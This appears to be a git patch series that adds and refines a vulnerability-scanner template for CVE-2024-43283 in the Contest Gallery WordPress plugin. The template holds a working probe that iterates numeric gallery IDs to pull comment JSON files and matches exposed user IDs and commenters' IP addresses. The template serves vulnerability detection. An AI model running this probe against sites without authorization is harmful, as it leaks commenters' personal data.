From 99db0ecf082da783bf4d84288ca1f4748ffecdb4 Mon Sep 17 00:00:00 2001 From: popcorn94 Date: Sun, 30 Nov 2025 22:43:29 +0800 Subject: [PATCH 1/5] Added CVE-2024-43283 Template --- CVE-2024-43283.yaml | 43 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 CVE-2024-43283.yaml diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml new file mode 100644 index 00000000000..2ae859aff1e --- /dev/null +++ b/CVE-2024-43283.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-43283 + +info: + name: Contest Gallery - Broken Access Control + author: popcorn94 + severity: medium + description: | + An attacker can retrieve your userID and IP address of commentors. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43283 + cwe-id: CWE-200 + metadata: + vendor: Wasiliy Strecker / ContestGallery developer + product: contest-gallery + tags: cve,cve2024 + +http: + - raw: + - | + GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: helpers/wordlists/numbers.txt + attack: batteringram + matchers: + - type: word + words: + - "WpUserId" + - "userIP" + condition: and + - type: status + status: + - 200 + condition: and + + + + \ No newline at end of file From 9892105356c51b7742c4a942cbe54676bc72f460 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 29 Jan 2026 15:30:45 +0530 Subject: [PATCH 2/5] Update CVE-2024-43283.yaml --- CVE-2024-43283.yaml | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml index 2ae859aff1e..13a1a96292d 100644 --- a/CVE-2024-43283.yaml +++ b/CVE-2024-43283.yaml @@ -8,36 +8,42 @@ info: An attacker can retrieve your userID and IP address of commentors. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure + - https://nvd.nist.gov/vuln/detail/CVE-2024-43283 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-43283 cwe-id: CWE-200 metadata: - vendor: Wasiliy Strecker / ContestGallery developer - product: contest-gallery - tags: cve,cve2024 - + verified: false + max-request: 1 + tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure + http: - raw: - | GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1 Host: {{Hostname}} - + payloads: - path: helpers/wordlists/numbers.txt - attack: batteringram + path: helpers/wordlists/numbers.txt + attack: batteringram + + matchers-condition: and matchers: - type: word + part: body words: - "WpUserId" - "userIP" condition: and + case-insensitive: true + + - type: word + part: content_type + words: + - "application/json" + - type: status status: - 200 - condition: and - - - - \ No newline at end of file From 9272093c577935480cb0f8a6e52a68afa6b257f6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 29 Jan 2026 15:34:58 +0530 Subject: [PATCH 3/5] Update CVE-2024-43283.yaml --- CVE-2024-43283.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml index 13a1a96292d..2f4fecb120e 100644 --- a/CVE-2024-43283.yaml +++ b/CVE-2024-43283.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2024-43283 cwe-id: CWE-200 metadata: - verified: false + verified: true max-request: 1 tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure @@ -34,8 +34,8 @@ http: - type: word part: body words: - - "WpUserId" - - "userIP" + - 'WpUserId":' + - 'userIP":' condition: and case-insensitive: true From 181ed7216c0f6d4b5d6cdd42c2ee1ac88448540d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 30 Jan 2026 09:53:07 +0900 Subject: [PATCH 4/5] Update CVE-2024-43283.yaml --- CVE-2024-43283.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml index 2f4fecb120e..5fed8bdf13d 100644 --- a/CVE-2024-43283.yaml +++ b/CVE-2024-43283.yaml @@ -5,7 +5,11 @@ info: author: popcorn94 severity: medium description: | - An attacker can retrieve your userID and IP address of commentors. + Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions. + impact: | + Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data. + remediation: | + Update to the latest version 23.1.2 or later to address the issue. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure - https://nvd.nist.gov/vuln/detail/CVE-2024-43283 @@ -23,7 +27,7 @@ http: - raw: - | GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1 - Host: {{Hostname}} + Host: {{Hostname}} payloads: path: helpers/wordlists/numbers.txt From 11edddbca515847bb1c00627044e557bb5c86511 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 30 Jan 2026 10:19:33 +0900 Subject: [PATCH 5/5] Update CVE-2024-43283.yaml --- CVE-2024-43283.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml index 5fed8bdf13d..c5d9eb97efe 100644 --- a/CVE-2024-43283.yaml +++ b/CVE-2024-43283.yaml @@ -30,7 +30,7 @@ http: Host: {{Hostname}} payloads: - path: helpers/wordlists/numbers.txt + path: helpers/wordlists/numbers.txt attack: batteringram matchers-condition: and